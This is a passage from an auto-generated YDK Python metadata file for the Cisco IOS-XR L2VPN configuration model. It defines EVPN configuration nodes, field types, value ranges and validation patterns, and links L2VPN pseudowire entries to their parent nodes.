_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-targets', REFERENCE_CLASS, 'EvpnRouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets',
[], [],
''' Route Target
''',
'evpn_route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('table-policy', ATTRIBUTE, 'str' , None, None,
[], [],
''' Table Policy for installation of forwarding
data to L2FIB
''',
'table_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevibgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' EVI ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('evi-load-balancing', REFERENCE_CLASS, 'EviLoadBalancing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing',
[], [],
''' Enter EVI Loadbalancing configuration submode
''',
'evi_load_balancing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-evi-cw-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' CW disable for EVPN EVI
''',
'evpn_evi_cw_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevi-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Description for EVPN EVI
''',
'evpnevi_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevibgp-auto-discovery', REFERENCE_CLASS, 'EvpnevibgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in EVPN EVI
''',
'evpnevibgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis',
False,
[
_MetaInfoClassMember('evpnevi', REFERENCE_LIST, 'Evpnevi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi',
[], [],
''' Enter EVPN EVI configuration submode
''',
'evpnevi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnLoadBalancing' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnLoadBalancing',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN Loadbalancing
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-flow-label', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Flow Label based load balancing
''',
'evpn_flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-load-balancing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPv4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two-byte or four-byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Route Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnbgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnbgpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnbgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Interface-specific timers
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-peering', ATTRIBUTE, 'int' , None, None,
[('0', '300')], [],
''' Interface-specific Peering timer
''',
'evpnac_peering',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-recovery', ATTRIBUTE, 'int' , None, None,
[('20', '3600')], [],
''' Interface-specific Recovery timer
''',
'evpnac_recovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnac-timers',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0',
False,
[
_MetaInfoClassMember('bytes1', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 1st Byte
''',
'bytes1',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes23', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 2nd and 3rd Bytes
''',
'bytes23',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes45', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 4th and 5th Bytes
''',
'bytes45',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes67', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 6th and 7th Bytes
''',
'bytes67',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes89', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 8th and 9th Bytes
''',
'bytes89',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'identifier-type0',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList',
False,
[
_MetaInfoClassMember('primary', ATTRIBUTE, 'str' , None, None,
[(0, 150)], [],
''' Primary services list
''',
'primary',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('secondary', ATTRIBUTE, 'str' , None, None,
[(0, 150)], [],
''' Secondary services list
''',
'secondary',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'service-list',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Manual service carving
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('service-list', REFERENCE_CLASS, 'ServiceList' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList',
[], [],
''' Manual service carving primary, secondary
lists
''',
'service_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'manual-service-carving',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment',
False,
[
_MetaInfoClassMember('backbone-source-mac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone Source MAC
''',
'backbone_source_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Ethernet Segment
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('es-import-route-target', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' ES-Import Route Target
''',
'es_import_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('force-single-homed', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Force Ethernet segment to remain
single-homed
''',
'force_single_homed',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('identifier-type0', REFERENCE_CLASS, 'IdentifierType0' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0',
[], [],
''' Ethernet segment identifier (Type 0)
''',
'identifier_type0',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balancing-per-service', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable per service load balancing mode
''',
'load_balancing_per_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('manual-service-carving', REFERENCE_CLASS, 'ManualServiceCarving' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving',
[], [],
''' Enter Manual service carving configuration
submode
''',
'manual_service_carving',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ethernet-segment',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ethernet-segment', REFERENCE_CLASS, 'EthernetSegment' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment',
[], [],
''' Enter Ethernet Segment configuration submode
''',
'ethernet_segment',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-timers', REFERENCE_CLASS, 'EvpnacTimers' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers',
[], [],
''' Enter Interface-specific timers configuration
submode
''',
'evpnac_timers',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-flush', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MVRP MAC Flush mode
''',
'mac_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces',
False,
[
_MetaInfoClassMember('evpn-interface', REFERENCE_LIST, 'EvpnInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface',
[], [],
''' Attachment circuit interface
''',
'evpn_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables',
False,
[
_MetaInfoClassMember('evpn-interfaces', REFERENCE_CLASS, 'EvpnInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces',
[], [],
''' Attachment Circuit interfaces
''',
'evpn_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-load-balancing', REFERENCE_CLASS, 'EvpnLoadBalancing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnLoadBalancing',
[], [],
''' Enter EVPN Loadbalancing configuration submode
''',
'evpn_load_balancing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-timers', REFERENCE_CLASS, 'EvpnTimers' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnTimers',
[], [],
''' Enter EVPN timers configuration submode
''',
'evpn_timers',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnbgp-auto-discovery', REFERENCE_CLASS, 'EvpnbgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnbgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in EVPN
''',
'evpnbgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevis', REFERENCE_CLASS, 'Evpnevis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis',
[], [],
''' Enter EVPN EVI configuration submode
''',
'evpnevis',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-tables',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn' : {
'meta_info' : _MetaInfoClass('Evpn',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN feature
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-tables', REFERENCE_CLASS, 'EvpnTables' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables',
[], [],
''' EVPN submodes
''',
'evpn_tables',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
}
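# Illustrative sketch, not part of the generated bindings: each _meta_table
# entry maps a generated class path to the _MetaInfoClass describing its YANG
# node (member list, owning module, YANG element name, namespace). The
# attribute names used below (`name`, `module_name`, `yang_name`,
# `meta_info_class_members`, and each member's `presentation_name`) mirror the
# positional constructor arguments visible above; treat them as assumptions
# about the ydk-py internals.
def _describe_meta_entry(path):
    """Print the YANG name and Python attribute of every member of an entry."""
    meta = _meta_table[path]['meta_info']
    print('%s (%s:%s)' % (meta.name, meta.module_name, meta.yang_name))
    for member in meta.meta_info_class_members:
        print('  %s -> %s' % (member.name, member.presentation_name))

# Example: _describe_meta_entry('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface')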
_meta_table['L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['L2Vpn.PwRouting.PwRoutingBgp']['meta_info']
_meta_table['L2Vpn.PwRouting.PwRoutingBgp']['meta_info'].parent =_meta_table['L2Vpn.PwRouting']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
